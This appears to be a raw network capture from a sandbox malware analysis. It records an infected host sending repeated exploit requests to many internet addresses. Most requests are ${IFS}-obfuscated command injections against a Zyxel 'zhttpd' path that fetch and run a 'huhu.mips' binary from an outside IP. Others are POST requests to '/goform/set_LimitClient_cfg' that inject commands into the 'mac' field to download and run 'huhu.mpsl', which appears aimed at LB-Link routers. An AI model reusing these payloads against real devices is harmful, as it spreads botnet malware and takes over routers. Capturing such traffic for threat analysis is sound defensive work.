                                              Jan 29, 2024 07:04:03.281249046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7773192.168.2.1454924204.87.55.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281286001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7774192.168.2.1456538139.185.146.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281313896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7775192.168.2.1433634180.155.46.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281337976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7776192.168.2.1459914182.114.186.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281366110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7777192.168.2.1457946104.146.255.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281404972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7778192.168.2.1456106147.159.129.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281443119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7779192.168.2.1449784161.44.101.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281488895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7780192.168.2.143537234.208.110.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281514883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7781192.168.2.144775690.227.218.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281536102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7782192.168.2.1450584112.205.131.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281590939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7783192.168.2.1436486122.106.200.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281616926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7784192.168.2.1442750112.43.171.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281668901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7785192.168.2.145449885.101.97.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281691074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7786192.168.2.1455494118.161.87.233443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281739950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7787192.168.2.144443296.96.230.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281773090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7788192.168.2.1443790173.66.124.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281840086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7789192.168.2.1455012130.183.127.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281862974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7790192.168.2.1456712124.48.250.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281897068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7791192.168.2.1457212196.41.198.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281929970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7792192.168.2.1459974112.39.30.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.281981945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7793192.168.2.1448336187.18.230.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.282033920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7794192.168.2.145624076.60.115.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.285260916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7795192.168.2.1451426126.13.47.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.285296917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7796192.168.2.1451234222.246.138.2408080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.413090944 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:04:03.763041019 CET1286INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 29 Jan 2024 06:04:03 GMT
                                              Content-Type: text/html
                                              Content-Length: 2450
                                              Connection: close
                                              x-ws-request-id: 65b73fd3_PS-CSX-01TJ4240_62890-58292
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 4d 6f 6e 2c 20 32 39 20 4a 61 6e 20 32 30 32 34 20 30 36 3a 30 34 3a 30 33 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 43 53 58 2d 30 31 54 4a 34 32 34 30 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 3a 38 30 38 30 2f 67 6f 66 6f 72 6d 2f 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 0a 09 09 09 09 3c 62 72 3e 52 65 71 75 65 73 74 2d 49 64 3a 20 36 35 62 37 33 66 64 33 5f 50 53 2d 43 53 58 2d 30 31 54 4a 34 32 34 30 5f 36 32 38 39 30 2d 35 38 32 39 32 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 62 72 3e 43 68 65 63 6b 3a 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 43 20 47 22 20 6f 6e 63 6c 69 63 6b
                                              Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Mon, 29 Jan 2024 06:04:03 GMT<br><span class="F">IP: 81.181.57.74</span>Node information: PS-CSX-01TJ4240<br>URL: http://:8080/goform/set_LimitClient_cfg<br>Request-Id: 65b73fd3_PS-CSX-01TJ4240_62890-58292<br><br>Check:<span class="C G" onclick


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7797192.168.2.1455110103.240.249.148080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.455550909 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:04:03.844592094 CET259INHTTP/1.1 501 Not Implemented
                                              Connection: Keep-Alive
                                              Content-Length: 121
                                              Date: Mon, 29 Jan 2024 06:03:58 GMT
                                              Expires: 0
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>
                                              Jan 29, 2024 07:04:03.844916105 CET251INHTTP/1.0 503 unknown method
                                              Connection: close
                                              Content-Length: 119
                                              Date: Mon, 29 Jan 2024 06:03:58 GMT
                                              Expires: 0
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 33 3a 20 75 6e 6b 6e 6f 77 6e 20 6d 65 74 68 6f 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 33 3a 20 75 6e 6b 6e 6f 77 6e 20 6d 65 74 68 6f 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html><head><title>Error 503: unknown method</title></head><body><h1>Error 503: unknown method</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7798192.168.2.1451684222.246.138.2408080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.611385107 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:04:03.956583023 CET1286INHTTP/1.1 400 Bad Request
                                              Server: nginx
                                              Date: Mon, 29 Jan 2024 06:04:03 GMT
                                              Content-Type: text/html
                                              Content-Length: 2450
                                              Connection: close
                                              x-ws-request-id: 65b73fd3_PS-CSX-01TJ4240_62458-13627
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 4d 6f 6e 2c 20 32 39 20 4a 61 6e 20 32 30 32 34 20 30 36 3a 30 34 3a 30 33 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 43 53 58 2d 30 31 54 4a 34 32 34 30 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 3a 38 30 38 30 2f 67 6f 66 6f 72 6d 2f 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 0a 09 09 09 09 3c 62 72 3e 52 65 71 75 65 73 74 2d 49 64 3a 20 36 35 62 37 33 66 64 33 5f 50 53 2d 43 53 58 2d 30 31 54 4a 34 32 34 30 5f 36 32 34 35 38 2d 31 33 36 32 37 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 62 72 3e 43 68 65 63 6b 3a 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 43 20 47 22 20 6f 6e 63 6c 69 63 6b
                                              Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Mon, 29 Jan 2024 06:04:03 GMT<br><span class="F">IP: 81.181.57.74</span>Node information: PS-CSX-01TJ4240<br>URL: http://:8080/goform/set_LimitClient_cfg<br>Request-Id: 65b73fd3_PS-CSX-01TJ4240_62458-13627<br><br>Check:<span class="C G" onclick


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7799192.168.2.1455728112.16.20.245443
                                              TimestampBytes transferredDirectionData
